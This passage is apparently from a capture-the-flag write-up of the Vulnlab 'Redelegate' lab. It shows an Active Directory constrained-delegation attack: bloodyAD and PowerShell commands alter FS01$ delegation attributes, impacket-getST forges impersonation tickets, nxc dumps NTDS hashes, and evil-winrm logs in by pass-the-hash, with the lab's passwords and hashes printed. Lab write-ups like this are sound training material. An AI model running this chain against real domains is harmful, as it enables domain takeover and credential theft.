nTSecurityDescriptor: O:S-1-5-21-4024337825-2033394866-2055507597-512G:S-1-5-21-4024337825-2033394866-2055507597-512D:AI(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-4024337825-2033394866-2055507597-517)(OA;;0x3;bf967aa8-0de6-11d0-a285-00aa003049e2;;S-1-5-32-550)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;SW;72e39547-7b18-11d1-adef-00c04fd8d5cd;;S-1-5-10)(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;S-1-5-10)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0xf01ff;;;S-1-5-21-4024337825-2033394866-2055507597-512)(A;;0xf01ff;;;S-1-5-21-4024337825-2033394866-2055507597-1113)(A;;0xf01ff;;;S-1-5-32-548)(A;;0x3;;;S-1-5-10)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-4024337825-2033394866-2055507597-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-4024337825-2033394866-2055507597-527)(OA;ID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;;S-1-5-21-4024337825-2033394866-2055507597-512)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-4024337825-2033394866-2055507597-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: FS01
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=redelegate,DC=vl
objectClass: top; person; organizationalPerson; user; computer
objectGUID: 0cdb28e9-77ab-4fff-a92e-964adfefe91a
objectSid: S-1-5-21-4024337825-2033394866-2055507597-1103
primaryGroupID: 515
pwdLastSet: 2024-11-26 09:48:45.536736+00:00
sAMAccountName: FS01$
sAMAccountType: 805306369
uSNChanged: 53568
uSNCreated: 24606
userAccountControl: WORKSTATION_TRUST_ACCOUNT
whenChanged: 2024-11-26 09:48:45+00:00
whenCreated: 2024-10-19 10:54:41+00:00

Set msDS-AllowedToDelegateTo to the resource we want to control (ldap on the domain controller in order to perform a dcsync):

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' set object 'CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL' msDS-AllowedToDelegateTo -v "ldap/dc.redelegate.vl"   
[+] CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL's msDS-AllowedToDelegateTo has been updated

Double check:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' get object 'CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL' --attr msDS-AllowedToDelegateTo                             

distinguishedName: CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL
msDS-AllowedToDelegateTo: ldap/dc.redelegate.vl

Update the userAccountControl attribute for the object FS01$ with the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

Double check all for FS01$:

$ impacket-findDelegation 'redelegate.vl'/'fs01$:Azerty1234!'                                    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

AccountName  AccountType  DelegationType                      DelegationRightsTo     SPN Exists 
-----------  -----------  ----------------------------------  ---------------------  ----------
FS01$        Computer     Constrained w/ Protocol Transition  ldap/dc.redelegate.vl  Yes        

all good

  1. Using legacy Powershell commands in our helen.frost’s evil-winrm session:
  • Set msDS-AllowedToDelegateTo to the resource we want to control (ldap on the DC in order to perform a dcsync)
  • Update the userAccountControl attribute for the object FS01$ with the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag:
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True

OR

  • Set msDS-AllowedToDelegateTo to the resource we want to control (cifs on the DC in order to impersonate ryan.cooper as he is Domain Admin)
  • Update the userAccountControl attribute for the object FS01$ with the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag:
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Set-ADComputer -Identity FS01 -Add @{'msDS-AllowedToDelegateTo'=@('cifs/dc.redelegate.vl')}
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True

Thirdly, we use the FS01 machine account to request a service ticket as any domain user to the DC:

  1. As the dc itself:
$ impacket-getST 'redelegate.vl'/'fs01$:Azerty1234!' -spn ldap/dc.redelegate.vl -impersonate dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
$ export KRB5CCNAME=dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache 
$ klist                                     
Ticket cache: FILE:dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
Default principal: dc@redelegate.vl

Valid starting     Expires            Service principal
11/26/24 19:39:20  11/27/24 05:39:19  ldap/dc.redelegate.vl@REDELEGATE.VL
	renew until 11/27/24 19:39:21

Double check that the authentication using the ticket works as expected:

$ nxc smb dc.redelegate.vl --use-kcache                                                               
SMB         dc.redelegate.vl 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB         dc.redelegate.vl 445    DC               [+] redelegate.vl\dc from ccache 

All good

OR

  1. As the Domain Admin ryan.cooper:
$ impacket-getST 'redelegate.vl'/'fs01$:Azerty1234!' -spn ldap/dc.redelegate.vl -impersonate ryan.cooper
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for user
[*] Impersonating ryan.cooper
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in ryan.cooper@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
$ export KRB5CCNAME=ryan.cooper@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache 
$ klist
Ticket cache: FILE:ryan.cooper@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
Default principal: ryan.cooper@redelegate.vl

Valid starting     Expires            Service principal
11/26/24 19:46:25  11/27/24 05:46:24  ldap/dc.redelegate.vl@REDELEGATE.VL
	renew until 11/27/24 19:46:26

Finally we can procced to grab the Administrator hash via dcsync:

$ nxc smb dc.redelegate.vl --use-kcache --ntds --user Administrator
SMB         dc.redelegate.vl 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB         dc.redelegate.vl 445    DC               [+] redelegate.vl\dc from ccache 
SMB         dc.redelegate.vl 445    DC               [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         dc.redelegate.vl 445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc.redelegate.vl 445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
SMB         dc.redelegate.vl 445    DC               [+] Dumped 1 NTDS hashes to /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194440.ntds of which 1 were added to the database
SMB         dc.redelegate.vl 445    DC               [*] To extract only enabled accounts from the output file, run the following command: 
SMB         dc.redelegate.vl 445    DC               [*] cat /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194440.ntds | grep -iv disabled | cut -d ':' -f1
SMB         dc.redelegate.vl 445    DC               [*] grep -iv disabled /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194440.ntds | cut -d ':' -f1

Or proceed with a full dump NTDS:

$ nxc smb dc.redelegate.vl --use-kcache -M ntdsutil                                                     
SMB         dc.redelegate.vl 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB         dc.redelegate.vl 445    DC               [+] redelegate.vl\ryan.cooper from ccache (Pwn3d!)
NTDSUTIL    dc.redelegate.vl 445    DC               [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\173261805
NTDSUTIL    dc.redelegate.vl 445    DC               Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    dc.redelegate.vl 445    DC               [+] NTDS.dit dumped to C:\Windows\Temp\173261805
NTDSUTIL    dc.redelegate.vl 445    DC               [*] Copying NTDS dump to /tmp/tmph_o_nlb8
NTDSUTIL    dc.redelegate.vl 445    DC               [*] NTDS dump copied to /tmp/tmph_o_nlb8
NTDSUTIL    dc.redelegate.vl 445    DC               [+] Deleted C:\Windows\Temp\173261805 remote dump directory
NTDSUTIL    dc.redelegate.vl 445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    dc.redelegate.vl 445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
NTDSUTIL    dc.redelegate.vl 445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL    dc.redelegate.vl 445    DC               DC$:1002:aad3b435b51404eeaad3b435b51404ee:40e9fff83a2b1e607b7648eb74acb461:::
NTDSUTIL    dc.redelegate.vl 445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
NTDSUTIL    dc.redelegate.vl 445    DC               FS01$:1103:aad3b435b51404eeaad3b435b51404ee:6d817d0d58c8cbc298b0edb8448f46d8:::
NTDSUTIL    dc.redelegate.vl 445    DC               Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
NTDSUTIL    dc.redelegate.vl 445    DC               Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
NTDSUTIL    dc.redelegate.vl 445    DC               Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:6d817d0d58c8cbc298b0edb8448f46d8:::
NTDSUTIL    dc.redelegate.vl 445    DC               Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
NTDSUTIL    dc.redelegate.vl 445    DC               Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
NTDSUTIL    dc.redelegate.vl 445    DC               James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
NTDSUTIL    dc.redelegate.vl 445    DC               Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
NTDSUTIL    dc.redelegate.vl 445    DC               sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
NTDSUTIL    dc.redelegate.vl 445    DC               [+] Dumped 13 NTDS hashes to /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194729.ntds of which 11 were added to the database
NTDSUTIL    dc.redelegate.vl 445    DC               [*] To extract only enabled accounts from the output file, run the following command: 
NTDSUTIL    dc.redelegate.vl 445    DC               [*] grep -iv disabled /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194729.ntds | cut -d ':' -f1

Then connect to the DC and get the root flag Redelegate_Root:

$ evil-winrm -i dc.redelegate.vl -u administrator -H 'a066fbf49e79f43fffc449810227e399'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
VL{3e75af0ec54eb6c3da6989cb61b50598}

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=f53d69c1-9978-4bf1-ab03-6f5b0301943e

Gc0p5bIXUAAasA-